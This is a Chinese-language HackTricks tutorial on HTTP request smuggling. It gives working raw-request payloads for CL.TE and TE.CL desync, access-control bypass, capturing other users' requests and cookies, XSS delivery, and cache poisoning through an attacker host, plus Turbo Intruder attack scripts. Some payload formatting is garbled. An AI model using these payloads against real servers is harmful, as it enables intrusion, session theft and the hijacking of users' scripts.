hacktricks/pentesting-web/http-request-smuggling/README.md
2023-08-03 19:12:22 +00:00

503 lines
26 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# HTTP请求劫持/HTTP解同步攻击
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
* 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass) 或 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
</details>
## 什么是
当**前端代理**和**后端**服务器之间发生**不同步**时,就会出现此漏洞,这使得**攻击者**能够发送一个HTTP请求该请求将被**前端代理**(负载均衡/反向代理)**解释为单个请求**,而被**后端**服务器**解释为2个请求**。\
这使得用户能够在到达后端服务器之后**修改下一个请求**。
### 理论
[**RFC规范2161**](https://tools.ietf.org/html/rfc2616)
> 如果接收到的消息同时具有Transfer-Encoding头字段和Content-Length头字段则必须忽略后者。
**Content-Length**
> Content-Length实体头字段指示发送给接收者的实体主体的大小以字节为单位
**Transfer-Encoding: chunked**
> Transfer-Encoding头字段指定用于安全传输有效负载主体的编码形式。\
> Chunked表示大数据以一系列块的形式发送
### 现实情况
**前端**(负载均衡/反向代理)**处理**_**content-length**_或_**transfer-encoding**_头字段而**后端**服务器**处理另一个**头字段,从而导致两个系统之间的**不同步**。\
这可能非常危险,因为**攻击者将能够向反向代理发送一个请求**,而**后端**服务器将**解释****注入的第二个请求**,就好像它**来自下一个客户端**,而该客户端的**真实请求**将成为**注入请求**的一部分。
### 特殊情况
请记住在HTTP中**换行符由2个字节组成**
* **Content-Length**:此头字段使用**十进制数**来指示请求的**主体**的**字节数**。主体预计以最后一个字符结束,**不需要在请求的末尾添加换行符**。
* **Transfer-Encoding**此头字段在**主体**中使用**十六进制数**来指示**下一个块**的**字节数**。**块**必须以**换行符**结尾,但是这个换行符**不计入**长度指示器。此传输方法必须以**大小为0的块后跟2个换行符**结束:`0`
* **Connection**:根据我的经验,建议在请求劫持的第一个请求中使用**`Connection: keep-alive`**。
## 基本示例
因此,请求劫持攻击涉及将`Content-Length`头字段和`Transfer-Encoding`头字段放入单个HTTP请求中并操纵这些字段以使前端和后端服务器以不同的方式处理请求。具体的操作方式取决于两个服务器的行为
* **CL.TE**:前端服务器使用`Content-Length`头字段,后端服务器使用`Transfer-Encoding`头字段。
* **TE.CL**:前端服务器使用`Transfer-Encoding`头字段,后端服务器使用`Content-Length`头字段。
* **TE.TE**:前端和后端服务器都支持`Transfer-Encoding`头字段,但可以通过某种方式混淆头字段来诱使其中一个服务器不处理它。
### CL.TE漏洞
在这种情况下,**前端**服务器使用**`Content-Length`**头字段,**后端**服务器使用**`Transfer-Encoding`**头字段。我们可以执行简单的HTTP请求劫持攻击如下所示
`POST / HTTP/1.1`\
`Host: vulnerable-website.com`\
`Content-Length: 30`\
`Connection: keep-alive`\
`Transfer-Encoding: chunked`\
``\ `0`\``\
`GET /404 HTTP/1.1`\
`Foo: x`
请注意,`Content-Length`指示**请求主体的长度为30个字节**_请记住HTTP使用换行符因此每个换行符占2个字节_因此反向代理**将完整的请求发送**到后端,并且后端将处理`Transfer-Encoding`头字段,将`GET /404 HTTP/1.1`作为**下一个请求的开头**(顺便说一句,下一个请求将附加到`Foo:x<下一个请求从这里开始>`)。
### TE.CL漏洞
在这种情况下,前端服务器使用`Transfer-Encoding`头,后端服务器使用`Content-Length`头。我们可以执行以下简单的HTTP请求欺骗攻击
`POST / HTTP/1.1`\
`Host: vulnerable-website.com`\
`Content-Length: 4`\
`Connection: keep-alive`\
`Transfer-Encoding: chunked`\
``\ `7b`\ `GET /404 HTTP/1.1`\ `Host: vulnerable-website.com`\ `Content-Type: application/x-www-form-urlencoded`\ `Content-Length: 30`\``\
`x=`\
`0`\
`\`
在这种情况下,**反向代理**将根据`Transfer-encoding`的指示将**整个请求**发送到**后端**。但是,**后端**只会处理`Content-Lenght`中指定的`7b`4字节。因此下一个请求将是以`GET /404 HTTP/1.1`开头的请求。
_请注意即使攻击必须以`0`结束,下一个请求也将作为**x**参数的额外值附加。_\
_还请注意嵌入请求的Content-Length将指示下一个请求的长度该请求将附加到**x**参数上。如果太小只会附加几个字节如果太大大于下一个请求的长度则会为下一个请求抛出错误。_
### TE.TE漏洞
在这种情况下,前端和后端服务器都支持`Transfer-Encoding`头,但可以通过某种方式使其中一个服务器不处理它来混淆头部。\
有无数种混淆`Transfer-Encoding`头的方法。例如:
`Transfer-Encoding: xchunked`\
``\ `Transfer-Encoding : chunked`\``\
`Transfer-Encoding: chunked`\
`Transfer-Encoding: x`\
``\ `Transfer-Encoding: chunked`\ `Transfer-encoding: x`\``\
`Transfer-Encoding:[tab]chunked`\
``\ `[space]Transfer-Encoding: chunked`\``\
`X: X[\n]Transfer-Encoding: chunked`\
\`\`\
`Transfer-Encoding`\
`: chunked`
根据停止处理TE头的服务器反向代理或后端您将找到**CL.TE漏洞**或**TE.CL漏洞**。
## 查找HTTP请求欺骗
### 使用时间技术查找CL.TE漏洞
如果应用程序容易受到CL.TE变体的请求欺骗攻击那么发送以下请求通常会导致延迟
```
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Connection: keep-alive
Content-Length: 4
1
A
0
```
由于前端服务器使用`Content-Length`头,它只会转发请求的一部分,省略了`0`。后端服务器使用`Transfer-Encoding`头,处理第一个块,然后等待下一个块到达。这将导致可观察到的时间延迟。
有时您在最终主机上收到400错误请求而不是超时就像在以下场景中发送CL.TE有效负载一样
![](<../../.gitbook/assets/image (444).png>)
响应是一个重定向其中包含错误信息甚至包含haproxy的版本
![](<../../.gitbook/assets/image (443).png>)
### 使用时间技术查找TE.CL漏洞
如果一个应用程序容易受到TE.CL请求混淆的攻击那么发送如下的请求通常会导致时间延迟
```
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Connection: keep-alive
Content-Length: 6
0
X
```
由于前端服务器使用了`Transfer-Encoding`头,它只会转发请求的一部分,省略了`X`。后端服务器使用`Content-Length`头,期望在消息体中接收更多内容,并等待剩余内容到达。这将导致可观察到的时间延迟。
### 探测HTTP请求走私漏洞
一旦您发现**时序技术有效**,您需要**探测**您是否可以**修改其他客户端请求**。\
最简单的方法是尝试污染自己的请求,例如发出对`/`的请求返回404。\
在[基本示例](./#basic-examples)中,我们已经看到了如何使用`CL.TE`和`TE.CL`示例来污染客户端请求,要求请求`/404`从而在客户端请求任何其他资源时引发404响应。
**注意事项**
在尝试通过干扰其他请求来确认请求走私漏洞时,应牢记以下重要考虑因素:
* "攻击"请求和"正常"请求应使用不同的网络连接发送到服务器。通过同一连接发送两个请求无法证明漏洞的存在。
* "攻击"请求和"正常"请求应尽可能使用相同的URL和参数名称。这是因为许多现代应用程序根据URL和参数将前端请求路由到不同的后端服务器。使用相同的URL和参数增加了请求将由同一后端服务器处理的机会这对于攻击是必不可少的。
* 在测试"正常"请求以检测来自"攻击"请求的任何干扰时,您与应用程序同时接收的任何其他请求(包括其他用户的请求)竞争。您应该在"攻击"请求之后立即发送"正常"请求。如果应用程序很忙,您可能需要多次尝试以确认漏洞。
* 在某些应用程序中,前端服务器充当负载均衡器,并根据某些负载均衡算法将请求转发到不同的后端系统。如果您的"攻击"和"正常"请求被转发到不同的后端系统,则攻击将失败。这是您可能需要尝试多次才能确认漏洞的另一个原因。
* 如果您的攻击成功干扰了后续请求,但这不是您发送的"正常"请求以检测干扰的请求,则意味着其他应用程序用户受到了您的攻击的影响。如果您继续执行测试,这可能会对其他用户产生破坏性影响,因此您应该谨慎行事。
### 通过逐跳头强制
通过滥用逐跳头,您可以指示代理**删除Content-Length或Transfer-Encoding头以便滥用HTTP请求走私**。
```
Connection: Content-Lentgh
```
有关跳跃式头部的更多信息,请访问:
{% content-ref url="../abusing-hop-by-hop-headers.md" %}
[abusing-hop-by-hop-headers.md](../abusing-hop-by-hop-headers.md)
{% endcontent-ref %}
## 滥用HTTP请求劫持
### 绕过前端安全控制
有时**前端代理会执行一些安全检查**。您可以通过滥用HTTP请求劫持来避开这些检查因为您将能够**绕过保护措施**。例如,在此示例中,您**无法从外部访问`/admin`**,而前端代理正在检查,但是这个**代理没有检查嵌入的请求**
**CL.TE**
`POST / HTTP/1.1`\
`Host: acb21fdd1f98c4f180c02944000100b5.web-security-academy.net`\
`Cookie: session=xht3rUYoc83NfuZkuAp8sDxzf0AZIwQr`\
`Connection: keep-alive`\
`Content-Type: application/x-www-form-urlencoded`\
`Content-Length: 67`\
`Transfer-Encoding: chunked`\
``\ `0`\``\
`GET /admin HTTP/1.1`\
`Host: localhost`\
`Content-Length: 10`\
\`\`\
`x=`
**TE.CL**
`POST / HTTP/1.1`\
`Host: ace71f491f52696180f41ed100d000d4.web-security-academy.net`\
`Cookie: session=Dpll5XYw4hNEu09dGccoTjHlFNx5QY1c`\
`Content-Type: application/x-www-form-urlencoded`\
`Connection: keep-alive`\
`Content-Length: 4`\
`Transfer-Encoding: chunked`\
`2b`\
`GET /admin HTTP/1.1`\
`Host: localhost`\
`a=x`\
`0`\
`\`
### 揭示前端请求重写 <a href="#revealing-front-end-request-rewriting" id="revealing-front-end-request-rewriting"></a>
在许多应用程序中,**前端服务器在将请求转发到后端服务器之前会对其进行一些重写**,通常是通过添加一些额外的请求头来实现。\
常见的做法是在请求中**添加头部**`X-Forwarded-For: <客户端的IP>`或类似的头部以便后端知道客户端的IP。\
有时,如果您可以**找到附加到请求的新值**,您可能能够**绕过保护措施**并**访问隐藏的信息**/**端点**。
要发现代理如何重写请求,您需要**找到一个后端将在响应中反映其值的POST参数**。然后,将此参数放在最后,并使用以下漏洞利用之一:
`POST / HTTP/1.1`\
`Host: vulnerable-website.com`\
`Content-Length: 130`\
`Connection: keep-alive`\
`Transfer-Encoding: chunked`\
`0`\
``\ `POST /search HTTP/1.1`\ `Host: vulnerable-website.com`\ `Content-Type: application/x-www-form-urlencoded`\ `Content-Length: 100`\``\
`search=`
在这种情况下,下一个请求将附加在`search=`之后,这也是**其值将在响应中反映**的参数,因此它将**反映下一个请求的头部**。
请注意,**只有嵌入请求的`Content-Length`头部中指示的长度将被反映**。如果使用较小的数字,只会反映几个字节,如果使用比所有头部的长度更大的数字,则嵌入请求将引发错误。因此,您应该**从一个较小的数字开始**,然后**逐渐增加**,直到看到您想要看到的所有内容。\
还要注意这种技术也可以利用TE.CL漏洞但请求必须以`search=\r\n0`结尾。然而,无论换行符是什么,值都将附加到搜索参数。
最后请注意,在这种攻击中,我们仍然在攻击自己以了解前端代理如何重写请求。
### 捕获其他用户的请求 <a href="#capturing-other-users-requests" id="capturing-other-users-requests"></a>
如果您可以找到一个将保存一个参数的内容的POST请求您可以将以下请求附加为该参数的值以便存储下一个客户端的请求
`POST / HTTP/1.1`\
`Host: ac031feb1eca352f8012bbe900fa00a1.web-security-academy.net`\
`Content-Type: application/x-www-form-urlencoded`\
`Content-Length: 319`\
`Connection: keep-alive`\
`Cookie: session=4X6SWQeR8KiOPZPF2Gpca2IKeA1v4KYi`\
`Transfer-Encoding: chunked`\
``\ `0`\``\
`POST /post/comment HTTP/1.1`\
`Host: ac031feb1eca352f8012bbe900fa00a1.web-security-academy.net`\
`Content-Length: 659`\
`Content-Type: application/x-www-form-urlencoded`\
`Cookie: session=4X6SWQeR8KiOPZPF2Gpca2IKeA1v4KYi`\
\`\`\
`csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=HACKTRICKS&email=email%40email.com&comment=`
在这种情况下,**参数comment的值将保存在页面上公开可见的帖子的评论**中,因此将出现一个评论,其中包含下一个请求的内容。
_这种技术的一个限制是它通常只能捕获直到适用于劫持请求的参数分隔符的数据。对于URL编码的表单提交这将是`&`字符,这意味着从受害用户的请求中存储的内容将在第一个`&`处结束这甚至可能出现在查询字符串中。_
还要注意这种技术也可以利用TE.CL漏洞但请求必须以`search=\r\n0`结尾。然而,无论换行符是什么,值都将附加到搜索参数。
### 使用HTTP请求走私来利用反射型XSS漏洞
如果网页还**存在反射型XSS漏洞**您可以利用HTTP请求走私来攻击网页的客户端。从HTTP请求走私中利用反射型XSS漏洞具有以下优势
* **无需与受害用户进行交互**
* 可以用于利用请求中的某些部分的XSS行为这在正常的反射型XSS攻击中**无法轻易控制**例如HTTP请求头。
如果网页在User-Agent头部存在反射型XSS漏洞您可以使用以下有效载荷来利用它
`POST / HTTP/1.1`\
`Host: ac311fa41f0aa1e880b0594d008d009e.web-security-academy.net`\
`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0`\
`Cookie: session=Ro7YknOtbl3bxURHAAxZz84qj3PSMnSY`\
`Transfer-Encoding: chunked`\
`Connection: keep-alive`\
`Content-Length: 213`\
`Content-Type: application/x-www-form-urlencoded`\
``\ `0`\``\
`GET /post?postId=2 HTTP/1.1`\
`Host: ac311fa41f0aa1e880b0594d008d009e.web-security-academy.net`\
`User-Agent: "><script>alert(1)</script>`\
`Content-Length: 10`\
`Content-Type: application/x-www-form-urlencoded`\
\`\`\
`A=`
### 使用HTTP请求走私将站内重定向转换为开放重定向 <a href="#using-http-request-smuggling-to-turn-an-on-site-redirect-into-an-open-redirect" id="using-http-request-smuggling-to-turn-an-on-site-redirect-into-an-open-redirect"></a>
许多应用程序会将一个URL上的请求重定向到另一个URL并将请求的`Host`头部中的主机名放入重定向URL中。一个例子是Apache和IIS Web服务器的默认行为其中对没有尾部斜杠的文件夹的请求会被重定向到包含尾部斜杠的同一文件夹
`GET /home HTTP/1.1`\
`Host: normal-website.com`\
\`\`\
`HTTP/1.1 301 Moved Permanently`\
`Location: https://normal-website.com/home/`
这种行为通常被认为是无害的,但它可以在请求走私攻击中被利用,将其他用户重定向到外部域。例如:
`POST / HTTP/1.1`\
`Host: vulnerable-website.com`\
`Content-Length: 54`\
`Connection: keep-alive`\
`Transfer-Encoding: chunked`\
``\ `0`\``\
`GET /home HTTP/1.1`\
`Host: attacker-website.com`\
`Foo: X`
走私的请求将触发对攻击者网站的重定向,这将影响由后端服务器处理的下一个用户请求。例如:
`GET /home HTTP/1.1`\
`Host: attacker-website.com`\
`Foo: XGET /scripts/include.js HTTP/1.1`\
`Host: vulnerable-website.com`\
\`\`\
`HTTP/1.1 301 Moved Permanently`\
`Location: https://attacker-website.com/home/`
在这里用户的请求是针对网站上的一个页面导入的JavaScript文件。攻击者可以通过返回自己的JavaScript来完全控制受害用户。
### 使用HTTP请求走私进行Web缓存污染 <a href="#using-http-request-smuggling-to-perform-web-cache-poisoning" id="using-http-request-smuggling-to-perform-web-cache-poisoning"></a>
如果**前端基础设施的任何部分执行内容缓存**(通常是为了提高性能),那么**可能会通过修改服务器的响应来污染缓存**。
我们已经看到如何将服务器的预期返回值修改为404在[基本示例](./#basic-examples)中),类似地,您可以使服务器在被污染的请求要求`/static/include.js`时返回`/index.html`的内容。这样,`/static/include.js`的内容将与`/index.html`的内容一起缓存,使得客户端无法访问`/static/include.js`(拒绝服务?)。
请注意,如果您找到了一些**开放重定向**或一些**站内重定向到开放重定向**(上一节),这将变得更加有趣。因为您可以**更改`/static/include.js`的缓存值**为您控制的脚本的值(对所有尝试下载`/static/include.js`新版本的客户端进行**通用XSS攻击**)。
在这个示例中,将展示如何利用**缓存污染+站内重定向到开放重定向**来修改`/static/include.js`缓存的内容以提供由攻击者控制的JS代码
`POST / HTTP/1.1`\
`Host: vulnerable.net`\
`Content-Type: application/x-www-form-urlencoded`\
`Connection: keep-alive`\
`Content-Length: 124`\
`Transfer-Encoding: chunked`\
``\ `0`\``\
`GET /post/next?postId=3 HTTP/1.1`\
`Host: attacker.net`\
`Content-Type: application/x-www-form-urlencoded`\
`Content-Length: 10`\
\`\`\
`x=1`
请注意嵌入的请求正在请求`/post/next?postId=3`。这个请求将被重定向到`/post?postId=4`并且将使用Host头部的值来指示域名。因此您可以**修改Host头部**以指向攻击者的服务器,重定向将使用该域名(站内重定向到开放重定向)。
然后,在**污染套接字**之后,您需要发送一个**GET请求**到\*\*`/static/include.js`\*\*,这个请求将被**站内重定向到开放重定向**请求污染,并将**获取攻击者控制的脚本的内容**。
下次有人请求`/static/include.js`时将提供攻击者脚本的缓存内容通用XSS攻击
### 使用HTTP请求走私进行Web缓存欺骗 <a href="#using-http-request-smuggling-to-perform-web-cache-deception" id="using-http-request-smuggling-to-perform-web-cache-deception"></a>
> **Web缓存污染和Web缓存欺骗有什么区别**
>
> * 在**Web缓存污染**中,攻击者会导致应用程序将一些恶意内容存储在缓存中,并且这些内容会从缓存中提供给其他应用程序用户。
> * 在**Web缓存欺骗**中,攻击者会导致应用程序将属于另一个用户的某些敏感内容存储在缓存中,然后攻击者从缓存中检索此内容。
在这种变体中,攻击者走私了一个请求,返回一些敏感的用户特定内容。例如:
`POST / HTTP/1.1`\
`Host: vulnerable-website.com`\
`Connection: keep-alive`\
`Content-Length: 43`\
`Transfer-Encoding: chunked`\
``\ `0`\``\
`GET /private/messages HTTP/1.1`\
`Foo: X`
如果**毒药到达正在访问某些静态内容**(如`/someimage.png`)的客户端,该内容将被**缓存**。受害者的`/private/messages`内容将被缓存在`/someimage.png`中,攻击者将能够窃取这些内容。\
请注意,**攻击者不知道受害者试图访问的静态内容**,因此最好的方法可能是执行攻击,等待几秒钟,然后**加载所有**静态内容并**搜索私人数据**。
### 使用HTTP响应不同步武装HTTP请求走私
您是否发现了一些HTTP请求走私漏洞但不知道如何利用它。尝试使用以下其他利用方法
{% content-ref url="../http-response-smuggling-desync.md" %}
[http-response-smuggling-desync.md](../http-response-smuggling-desync.md)
{% endcontent-ref %}
## Turbo intruder脚本
### CL.TE
来自[https://hipotermia.pw/bb/http-desync-idor](https://hipotermia.pw/bb/http-desync-idor)
```python
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
engine.start()
attack = '''POST / HTTP/1.1
Transfer-Encoding: chunked
Host: xxx.com
Content-Length: 35
Foo: bar
0
GET /admin7 HTTP/1.1
X-Foo: k'''
engine.queue(attack)
victim = '''GET / HTTP/1.1
Host: xxx.com
'''
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
```
### TE.CL
来自:[https://hipotermia.pw/bb/http-desync-account-takeover](https://hipotermia.pw/bb/http-desync-account-takeover)
```python
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
engine.start()
attack = '''POST / HTTP/1.1
Host: xxx.com
Content-Length: 4
Transfer-Encoding : chunked
46
POST /nothing HTTP/1.1
Host: xxx.com
Content-Length: 15
kk
0
'''
engine.queue(attack)
victim = '''GET / HTTP/1.1
Host: xxx.com
'''
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
```
## 更多信息
![](../../.gitbook/assets/EKi5edAUUAAIPIK.jpg)
[图片来源](https://twitter.com/SpiderSec/status/1200413390339887104?ref\_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1200413390339887104\&ref\_url=https%3A%2F%2Ftwitter.com%2FSpiderSec%2Fstatus%2F1200413390339887104)
## 工具
* [https://github.com/anshumanpattnaik/http-request-smuggling](https://github.com/anshumanpattnaik/http-request-smuggling)
* [https://github.com/PortSwigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler)
* [https://github.com/gwen001/pentest-tools/blob/master/smuggler.py](https://github.com/gwen001/pentest-tools/blob/master/smuggler.py)
* [https://github.com/defparam/smuggler](https://github.com/defparam/smuggler)
* [https://github.com/bahruzjabiyev/t-reqs-http-fuzzer](https://github.com/bahruzjabiyev/t-reqs-http-fuzzer)这个工具是一个基于语法的HTTP模糊测试工具用于查找奇怪的请求欺骗差异。
## 参考资料
* [https://portswigger.net/web-security/request-smuggling](https://portswigger.net/web-security/request-smuggling)
* [https://portswigger.net/web-security/request-smuggling/finding](https://portswigger.net/web-security/request-smuggling/finding)
* [https://portswigger.net/web-security/request-smuggling/exploiting](https://portswigger.net/web-security/request-smuggling/exploiting)
* [https://medium.com/cyberverse/http-request-smuggling-in-plain-english-7080e48df8b4](https://medium.com/cyberverse/http-request-smuggling-in-plain-english-7080e48df8b4)
* [https://github.com/haroonawanofficial/HTTP-Desync-Attack/](https://github.com/haroonawanofficial/HTTP-Desync-Attack/)
* [https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html](https://memn0ps.github.io/2019/11/02/HTTP-Request-Smuggling-CL-TE.html)
* [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一个**网络安全公司**工作吗想要在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
</details>